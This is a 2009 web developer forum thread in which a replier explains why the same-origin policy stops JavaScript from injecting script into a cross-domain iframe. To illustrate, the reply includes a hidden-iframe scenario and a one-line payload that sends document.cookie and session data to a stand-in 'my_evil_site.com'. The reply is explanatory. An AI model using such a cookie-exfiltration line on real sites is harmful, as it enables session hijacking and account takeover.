inserting script in an iframe

Forum Moderators: open

Message Too Old, No Replies

inserting script in an iframe

itsdone

10:58 am on Jun 23, 2009 (gmt 0)

I am looking for some way to insert script tag into an IFRAME within the current page using javascript.

the iframe contains a src of a foreign website.is this possible to do ?

Thanks

httpwebwitch

3:00 pm on Jun 23, 2009 (gmt 0)

no, it is not possible to do.

httpwebwitch

3:28 pm on Jun 23, 2009 (gmt 0)

that was my short answer.

for a long answer, check out this very thorough article written by Michael Mahemoff, author of "Ajax Patterns"

[softwareas.com...]

It is possible to communicate and manipulate content betwixt frames/windows, but only in certain situations, and what you can do is limited. Yours is not one of those situations.

Imagine if it was possible to do what you ask.

1) I would create a page, and buy some paid traffic into it, or write a linkbait article for digg and get users visiting my site. Let's say you stumble upon (no pun intended) my site and view my page.

2) On that page, I would create an <iframe> pointing to a popular networking site. In this example I'll use facebook. I would hide that iframe using CSS.

<iframe src="http://www.f*ceb**k.com/home.php" style='visibility:hidden'/>

With a hidden iframe, all this would go on invisibly and you'd have no clue that you're being cracked.

3) If you have a persistent session at facebook (as many people do), then inside that iframe you would already be logged in to face. The frame uses your facebook cookie, and Facebook has no idea whether your profile was loaded in an iframe or any other kind of window.

4) IF WHAT YOU ASK WAS POSSIBLE, then I would inject some <script> onto your facebook profile page. I would create an Image, with a querystring full of goodies, pointed at my evil hacker site:

var h = new Image();h.src="my_evil_site.com?yourcookie="+document.cookie+"&yoursessionkey="+window.sessionkey."&yourmaritalstatus="+window.yourinfo.areyoumarried

the example above is purely hypothetical, any similarity to real objects is purely coincidental

5) My server at "my_evil_site.com" would receive that HTTP request for the image, containing all the secret authentication information I need to enter facebook impersonating you. Storing or alerting this information is trivial. Within seconds I could go into facebook, log in AS YOU, change your password, sign you up for Facebook Ads, buy a few thousand $ worth of advertising for "buy-my-amazing-male-enhancement-pills.com"... and send dirty pictures to your grandma.

I hope this demonstrates why it's forbidden for JavaScript to manipulate the content of an <iframe> hosted on another domain.